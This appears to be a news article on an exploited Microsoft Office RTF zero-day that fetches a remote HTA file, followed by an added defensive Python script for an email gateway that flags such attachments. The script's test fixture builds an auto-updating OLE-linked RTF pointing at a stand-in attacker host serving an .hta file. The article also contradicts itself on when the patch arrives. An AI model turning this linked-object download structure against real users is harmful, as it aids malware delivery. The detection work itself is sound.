Researchers have revealed that a critical Microsoft Office zero-day has been used in attacks against Word users since late January.
The attackers' emails carried a Microsoft Word RTF (Rich Text Format) document and were sent from addresses using the recipient's own domain name. When the document used in this attack is opened, it reaches out to an external server and downloads an HTA (HTML Application) file containing malicious VBScript, which is then executed.
Researchers from a number of security companies have warned about the vulnerability, which Microsoft has yet to acknowledge publicly.
Microsoft will fix the bug, which surfaced last weekend, as part of today's Patch Tuesday.
For now, McAfee suggests users do not open Office files obtained from untrustworthy locations. Microsoft is now working on an official fix for the vulnerability.
Within your email filtering solution, such as Intermedia Email Protection, consider temporarily putting a policy in place to block Word documents until Microsoft releases the patch.
When the user attempts to download the file, a malicious .hta file is pulled from the attacker's server, which then loads and executes malicious script. OLE (Object Linking and Embedding), which allows an application to embed other documents or objects, was used in 2014 by an advanced persistent threat group known as Sandworm to target government organisations and infrastructure providers in Europe and the North Atlantic Treaty Organisation (NATO).
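As an added, defender-side example (not code from the original article or from any vendor it mentions), the following Python script shows how the temporary email-gateway policy suggested above could be implemented alongside a more targeted check for the attack chain just described: it identifies Word-family attachments by content rather than file extension, and for RTF files it decodes any embedded OLE object data and flags objects that link out to an .hta file. The sample attachments, the placeholder host name attacker.example.invalid, and the heuristic thresholds are all constructed for this example; \objautlink and \objupdate are standard RTF control words for linked and auto-updating objects.

```python
import binascii
import io
import re
import zipfile

# ---- Constructed sample attachments (placeholders, not real malware) ----

# Host name and path are placeholders; the blob is a constructed stand-in for
# the OLE object data an RTF carries as hex text under \*\objdata.
PLACEHOLDER_URL = "http://attacker.example.invalid/update.hta"
_objdata = (b"\x01\x05\x00\x00\x02\x00\x00\x00"
            + PLACEHOLDER_URL.encode("utf-16-le") + b"\x00\x00")
SAMPLE_RTF = (
    "{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Calibri;}}\\pard Quarterly figures attached.\\par\n"
    "{\\object\\objautlink\\objupdate\\objw300\\objh200{\\*\\objdata "
    + binascii.hexlify(_objdata).decode("ascii")
    + "}}}"
).encode("ascii")
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0\\pard Minutes of the meeting.\\par}"

def _make_docx() -> bytes:
    """Minimal OOXML-style zip carrying the word/ part that marks a .docx."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()

SAMPLE_DOCX = _make_docx()
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound-file header of a legacy .doc
SAMPLE_DOC = OLE2_MAGIC + b"\x00" * 504
SAMPLE_PDF = b"%PDF-1.4\n% constructed, no Office content\n"

WORD_FAMILY = {"rtf", "doc", "docx"}

def sniff_type(data: bytes) -> str:
    """Classify by content, not extension: a renamed RTF still opens in Word."""
    if data.lstrip().startswith(b"{\\rtf"):
        return "rtf"
    if data.startswith(OLE2_MAGIC):
        return "doc"
    if data.startswith(b"PK\x03\x04"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                if "word/document.xml" in z.namelist():
                    return "docx"
        except zipfile.BadZipFile:
            pass
        return "zip"
    return "other"

OBJECT_RE = re.compile(rb"\\object\b")
OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9a-fA-F\s]+)")
URL_RE = re.compile(rb"https?://[\w\-.]+(?::\d+)?/[^\s\"'<>]*", re.IGNORECASE)

def extract_objdata(rtf: bytes) -> list:
    """Decode every \\*\\objdata hex group in the document into raw bytes."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        try:
            blobs.append(binascii.unhexlify(hexstr))
        except (binascii.Error, ValueError):
            blobs.append(hexstr)      # malformed hex: still search the raw text
    return blobs

def find_urls(blob: bytes) -> list:
    """URLs in a blob, whether stored as ASCII or as UTF-16LE (nulls stripped)."""
    found = set()
    for view in (blob, blob.replace(b"\x00", b"")):
        for m in URL_RE.finditer(view):
            found.add(m.group(0).decode("ascii", "replace"))
    return sorted(found)

def analyse_rtf(rtf: bytes) -> dict:
    """Summarise OLE object usage and any remote targets found in an RTF."""
    findings = {
        "ole_objects": len(OBJECT_RE.findall(rtf)),
        "auto_link": b"\\objautlink" in rtf,    # linked, not embedded, object
        "auto_update": b"\\objupdate" in rtf,   # link refreshed when the file opens
        "urls": [],
        "hta_urls": [],
    }
    for blob in extract_objdata(rtf):
        for url in find_urls(blob):
            findings["urls"].append(url)
            if url.lower().split("?", 1)[0].endswith(".hta"):
                findings["hta_urls"].append(url)
    return findings

def attachment_verdict(data: bytes, block_word_family: bool = False):
    """Gateway decision: ('allow' | 'quarantine' | 'block', reason)."""
    kind = sniff_type(data)
    if kind == "rtf":
        f = analyse_rtf(data)
        if f["hta_urls"]:
            return "block", "RTF OLE object links to an HTA: " + ", ".join(f["hta_urls"])
        if f["ole_objects"] and (f["auto_link"] or f["auto_update"]) and f["urls"]:
            return "quarantine", "RTF linked OLE object fetches a remote URL"
    if block_word_family and kind in WORD_FAMILY:
        return "block", f"temporary policy: {kind} attachments held until the patch ships"
    return "allow", f"{kind} attachment passed checks"

if __name__ == "__main__":
    samples = [("report.doc (really RTF)", SAMPLE_RTF), ("minutes.rtf", BENIGN_RTF),
               ("deck.docx", SAMPLE_DOCX), ("legacy.doc", SAMPLE_DOC), ("invoice.pdf", SAMPLE_PDF)]
    for name, data in samples:
        print(f"{name:26} -> {attachment_verdict(data)}")
```

The content-based check is deliberately narrower than the blanket policy: with `block_word_family=False` the benign RTF and the .docx pass while the RTF whose linked object points at an .hta is blocked, and switching the flag on reproduces the article's temporary "block all Word documents" stance without touching PDFs or other attachment types.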
Business users regularly trade Office files via email, a fact that cyber-attackers rely on for their spam and phishing campaigns. Protected View is normally used by default when opening a file delivered in an email or downloaded from the web, disabling everything but the essentials of its content to maximise security. Both McAfee and FireEye stated that the exploit can bypass most memory-based mitigations built into Windows.
Genwei Jiang, senior research engineer at FireEye, said that Microsoft Office users should apply a patch as soon as one is available. FireEye added that the attack cannot bypass Office Protected View, and suggested that all users keep this feature turned on.
Worryingly, the vulnerability remains unpatched for now, but Microsoft has pledged to fix the bug when the monthly security update rolls out on April 11.